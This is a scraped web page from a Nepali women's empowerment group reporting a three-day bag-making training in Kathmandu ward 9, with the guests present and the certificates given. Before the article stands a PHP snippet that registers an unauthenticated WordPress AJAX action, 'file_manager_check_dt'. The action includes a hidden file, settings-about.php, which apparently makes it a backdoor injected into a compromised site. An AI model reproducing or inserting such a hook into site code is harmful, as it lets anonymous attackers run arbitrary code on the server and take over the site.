if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } ब्याग बनाउने तालिम सम्पन्न | Taramandal Mahila Sashaktikaran Abhiyan

तारामंडल महिला शसक्तिकरण अभियान को आयोजनामा र काठमाडौँ महानगरपालिका वडा नं ९ को सहआयोजनामा ३ दिने ब्याग बनाउने तालिम सम्पन्न भएको छ।


काठमाडौँ महानगरपालिका वडा नं ९ का २५ जना भन्दा बढी महिला हरुलाई सस्थाले ब्याग बनाउने तालिम दिएको थियो। तालिम जेठ १४ वाट सुरुभएको थियो भने समापन कार्यक्रमको सभापति कुन्ती देवी पोख्रेल अतिथि हरुमा राप्रपाकि केन्द्रिय सदस्य एवं राष्ट्रिय प्रजातान्त्रिक महिला संगठनकि सहअध्यक्ष निना भेटवाल काठमाडौँ महानगरवडा नं ९ का अध्यक्ष रामकृष्ण श्रेष्ठ वडा सदस्य टेकराज अधिकारी, सिर्जना भेटवाल लगाएतको उपस्थिति रहेको थियो ।

कार्यक्रममा सम्पुण महिला प्रशिक्षक र प्रशिक्षार्थीहरुलाई प्रमाण पत्र प्रदान गरिएको थियो भने अतिथि हरुलाई माया को चिनो को रुपमा ब्याग हरु प्रदान गरिएको थियो ।

कार्यक्रममा अतिथिहरुले आगामी दिनमा पनि सहकार्य गर्नुपर्ने र तालिम लिनुभएका हरुले पनि अरुलाई सिकाउदै आफु पनि आत्मनिर्भर बन्नुपर्ने बताएका थिय।